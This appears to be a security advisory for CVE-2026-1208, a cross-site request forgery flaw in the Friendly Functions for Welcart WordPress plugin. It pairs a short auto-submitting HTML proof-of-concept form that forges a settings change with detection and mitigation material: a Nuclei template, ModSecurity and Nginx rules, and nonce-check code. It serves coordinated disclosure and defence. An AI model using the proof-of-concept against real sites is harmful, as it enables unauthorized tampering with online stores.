Keywords: CVE-2026-1208, Friendly Functions for Welcart vulnerability, CSRF, Cross-Site Request Forgery, WordPress security, WordPress plugin vulnerability, CWE-352, Welcart security, settings manipulation, WordPress CVE 2026
- Overview
- Vulnerability Details
- Technical Analysis
- Attack Vector
- Proof of Concept
- Remediation Guide
- CVSS Metrics
- References
- Security Contact
Friendly Functions for Welcart WordPress Plugin CSRF Vulnerability (CVE-2026-1208) - Security flaw allowing unauthenticated attackers to modify plugin settings via forged requests.
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the Friendly Functions for Welcart plugin that allows unauthenticated attackers to update plugin settings by tricking an administrator into clicking a malicious link.
Discovered by: Kai Aizen (SnailSploit)
Published: January 23, 2026
CVSS Score: 4.3 (Medium)
CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Plugin: Friendly Functions for Welcart
Attack Type: Cross-Site Request Forgery to Settings Update
Required Privileges: None (Unauthenticated Attack + Social Engineering)
The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the settings page. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
This vulnerability allows unauthenticated attackers to:
- Modify plugin settings without authorization
- Manipulate Welcart e-commerce functionality
- Potentially disrupt store operations
- Chain with other vulnerabilities for escalated attacks
- Vulnerable: All versions ≤ 1.2.5
- Patched: Version 1.2.6 and above
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
| Metric | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | Required (UI:R) |
| Scope | Unchanged (S:U) |
| Confidentiality | None (C:N) |
| Integrity | Low (I:L) |
| Availability | None (A:N) |
The vulnerability exists in the settings page implementation where:
- The plugin settings form lacks proper nonce validation
- Settings update requests are processed without verifying request origin
- No CSRF tokens are generated or validated
- Administrative actions can be performed via cross-origin requests
The vulnerability was identified in the following locations:
ffw_function_settings.php- Line 53ffw_function_settings.php- Line 58
The attack requires social engineering to trick an authenticated administrator into visiting a malicious page or clicking a crafted link while logged into their WordPress site.
Target: WordPress Admin with Friendly Functions for Welcart installed
Method: Malicious HTML page with auto-submitting form
Trigger: Administrator clicks link or visits attacker-controlled page
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-1208 - CSRF PoC</title>
</head>
<body>
<h1>Loading...</h1>
<form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
<input type="hidden" name="ffw_setting_option" value="malicious_value" />
<!-- Add additional setting fields as needed -->
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
⚠️ Warning: This PoC is provided for educational and authorized testing purposes only.
- Set up a WordPress instance with Friendly Functions for Welcart <= 1.2.5
- Host the CSRF payload on an attacker-controlled server
- Authenticate as an administrator on the target WordPress site
- Visit the attacker-controlled page (simulating clicking a malicious link)
- Observe that plugin settings are modified without explicit consent
# Check if vulnerable version is installed
wp plugin list | grep -i "friendly-functions-for-welcart"
# Get specific version
wp plugin get friendly-functions-for-welcart --field=versionNuclei Template:
id: CVE-2026-1208
info:
name: Friendly Functions for Welcart - CSRF to Settings Update
author: SnailSploit
severity: medium
description: |
Friendly Functions for Welcart plugin for WordPress is vulnerable
to CSRF in versions <= 1.2.5 due to missing nonce validation.
reference:
- https://github.com/SnailSploit/CVE-2026-1208
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-1208
cwe-id: CWE-352
tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "Friendly Functions for Welcart"
- type: regex
regex:
- "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?i)Stable tag:\\s*([0-9.]+)"ModSecurity Rule:
# CVE-2026-1208 - Block CSRF attempts to FFW settings
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"
# Alternative: Block if referer doesn't match site domain
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026002,phase:2,t:none,\
log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"Nginx Rule:
# CVE-2026-1208 - CSRF Protection for FFW Settings
location /wp-admin/admin.php {
# Check for ffw-settings page without proper referer
if ($arg_page = "ffw-settings") {
set $csrf_check "1";
}
if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
set $csrf_check "${csrf_check}1";
}
if ($csrf_check = "11") {
return 403;
}
# Pass to PHP handler
try_files $uri =404;
fastcgi_pass php-fpm;
include fastcgi_params;
}Immediate Action Required:
- Update to Friendly Functions for Welcart version 1.2.6 or later immediately
- Review your site's plugin settings for unauthorized modifications
- If you cannot update immediately, consider temporarily disabling the plugin
- Navigate to Plugins > Installed Plugins in WordPress admin
- Locate "Friendly Functions for Welcart"
- Click Update Now to upgrade to version 1.2.6 or later
- Verify the update was successful
- Review and confirm your plugin settings are correct
Ensure all settings forms implement proper CSRF protection:
// Example of proper CSRF protection in WordPress
// In your form:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');
// In your form handler:
function process_settings_update() {
// Verify nonce
if (!isset($_POST['ffw_settings_nonce']) ||
!wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
wp_die('Security check failed');
}
// Check capabilities
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
// Process settings update
// ...
}- January 23, 2026 - Vulnerability publicly disclosed
- January 23, 2026 - CVE-2026-1208 assigned
- Version 1.2.6 - Patch released by plugin vendor
- Wordfence Intelligence Database Entry
- WordPress Plugin Trac - Line 53
- WordPress Plugin Trac - Line 58
- Plugin Changeset (Patch)
- MITRE CVE Entry
Researcher:
- Kai Aizen - SnailSploit
Disclosure Process: Coordinated through Wordfence Bug Bounty Program
This information is provided for security research and defensive purposes only. Any exploitation of this vulnerability for malicious purposes is illegal and unethical. Always obtain proper authorization before testing systems you do not own.
For questions or additional information about this vulnerability:
- Email: kai@owasp.com
- Website: snailsploit.com
- Organization: SnailSploit Security Research
Last updated: January 23, 2026